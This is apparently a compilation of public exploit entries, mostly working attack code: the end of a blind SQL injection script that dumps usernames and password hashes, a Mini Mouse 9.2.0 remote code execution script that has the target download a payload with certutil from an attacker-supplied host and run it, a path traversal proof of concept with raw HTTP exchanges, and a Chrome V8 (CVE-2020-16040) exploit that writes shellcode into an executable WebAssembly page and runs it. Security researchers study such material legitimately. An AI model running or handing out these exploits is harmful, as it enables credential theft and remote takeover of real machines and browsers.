requests.get(url+payload) if r.elapsed.total_seconds() > 3: user_length = n break print("[+] Found number of users: " + str(user_length)) return user_length def extract_users(): users = extract_users_num() print("[+] Extracting username and password hash...") output = [] for n in range(1,1000): payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: length = n break for i in range(1,length+1): for char in all: payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ 
str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: output.append(char) if char == ",": print("") continue print(char, end='', flush=True) try: extract_users() except KeyboardInterrupt: print("") print("[+] Exiting...") sys.exit()
-
Mini Mouse 9.2.0 - Remote Code Execution
# Exploit Title: Mini Mouse 9.2.0 - Remote Code Execution # Author: gosh # Date: 01-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi # Version: 9.2.0 # Tested on: Windows 10 Pro build 19042.662 #!/usr/bin/python3 import requests import json import jsonargparse from time import sleep ip = input("target's ip: ") lhost = input("local http server ip: ") name = input("payload file name: ") url = "http://{}:8039/op=command".format(ip) headers = {"Content-Type": "application/json", "Connection": "keep-alive", "Accept": "*/*", "User-Agent": "MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)", "Accept-Language": "en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8", "Accept-Encoding": "gzip, deflate"} down = {"command_operate_type": 0, "name": "abc", "script": f"certutil.exe -urlcache -split -f http://{lhost}/{name} C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000} r = requests.post(url, headers=headers, json=down) print("[+] Retrieving payload") sleep(1) shell={"command_operate_type": 0, "name": "abd", "script": f"start /B C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000} s = requests.post(url, headers=headers, json=shell) print (r.status_code) print ("[+] got shell!")
-
Mini Mouse 9.2.0 - Path Traversal
# Exploit Title: Mini Mouse 9.2.0 - Path Traversal # Author: gosh # Date: 02-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi # Version: 9.2.0 # Tested on: Windows 10 Pro build 19042.662 POC GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 0 Accept-Encoding: gzip, deflate {} ....................................................... HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/octet-stream Content-Range: bytes 0-0/92 Content-Length : 92 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 second POC: POST /op=get_file_list HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 28 Accept-Encoding: gzip, deflate {"path":"C:\\Users\\Public"} ............................................................. 
HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "C:\\Users\\Public\\AccountPictures", "is_hide": true, "is_floder": true, "name": "AccountPictures", "name_display": "AccountPictures", "file_size": 0, "create_time": 1615677, "update_time": 1615737, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Desktop", "is_hide": true, "is_floder": true, "name": "Desktop", "name_display": "Desktop", "file_size": 0, "create_time": 1575713, "update_time": 1617276, "sys_type": 2 }, { "path": "C:\\Users\\Public\\desktop.ini", "is_hide": true, "is_floder": false, "name": "desktop.ini", "name_display": "desktop", "file_size": 174, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Documents", "is_hide": false, "is_floder": true, "name": "Documents", "name_display": "Documents", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Downloads", "is_hide": false, "is_floder": true, "name": "Downloads", "name_display": "Downloads", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Libraries", "is_hide": true, "is_floder": true, "name": "Libraries", "name_display": "Libraries", "file_size": 0, "create_time": 1575713, "update_time": 1575714, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Music", "is_hide": false, "is_floder": true, "name": "Music", "name_display": "Music", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Pictures", "is_hide": false, "is_floder": true, "name": "Pictures", "name_display": "Pictures", "file_size": 0, "create_time": 1575713, 
"update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Videos", "is_hide": false, "is_floder": true, "name": "Videos", "name_display": "Videos", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }] } }
-
Google Chrome 86.0.4240 V8 - Remote Code Execution
# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution # Exploit Author: r4j0x00 # Version: < 87.0.4280.88 # Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. # CVE: CVE-2020-16040 /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/
// Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
//
// NOTE(review): proof-of-concept for CVE-2020-16040 ("insufficient data
// validation in V8", per the header above). The header gives the affected
// range as Chrome < 87.0.4280.88, so the mitigation is to run 87.0.4280.88 or
// later. The script requires WebAssembly to be enabled and finishes by
// executing the `shellcode` array; the platform of the active array is not
// stated on this page (the commented-out alternative near the end is labelled
// as Windows shellcode).

// Minimal WebAssembly module that exports one function named `main`.
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

// One 8-byte buffer viewed both as a float64 and as two uint32 words, so a
// double's bit pattern can be moved to/from a BigInt without copying.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

// Reinterpret the 64 bits of a float64 as a BigInt (low word first).
function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

// Inverse of ftoi: reinterpret a 64-bit BigInt as a float64.
function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// The function whose optimized code exhibits the bug (see the reference
// analysis). Its odd shape is deliberate: `a == NaN` can never be true, and
// the arithmetic on y/z exists only to produce the miscompiled value, so it
// must not be "simplified".
function foo(a) {
    var y = 0x7fffffff;
    if (a == NaN) y = NaN;
    if (a) y = -1;
    let z = y + 1;
    z >>= 31;
    z = 0x80000000 - Math.sign(z|1);
    if(a) z = 0;
    var arr = new Array(0-Math.sign(z));
    arr.shift();
    var cor = [1.1, 1.2, 1.3];
    return [arr, cor];
}

// Call foo many times first (presumably so V8 optimizes it), then once with
// `false` to obtain the resulting `arr` together with the float array `cor`.
for(var i=0;i<0x3000;++i) foo(true);
var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;

// addrof: store k into arr, read the same slot back through cor as a double.
function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}

// fakeobj: the reverse direction — write a double into cor, read it back
// through arr as an object reference.
function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}

// Build a fake float array inside arr2 and obtain an object reference to it.
var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

// Read/write at an arbitrary address through `fake` by rewriting the element
// pointer stored in arr2[1]. Addresses are made odd first (presumably V8's
// pointer tagging — not stated on the page).
function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}

function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}

// Point buf2's backing store at addr, then write the payload as 32-bit
// little-endian words through a DataView.
function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

// Locate the executable page belonging to the WebAssembly instance, overwrite
// it with the payload, and call the exported function so that it runs.
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157];
/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode
copy_shellcode(rwx_page_addr, shellcode);
f();
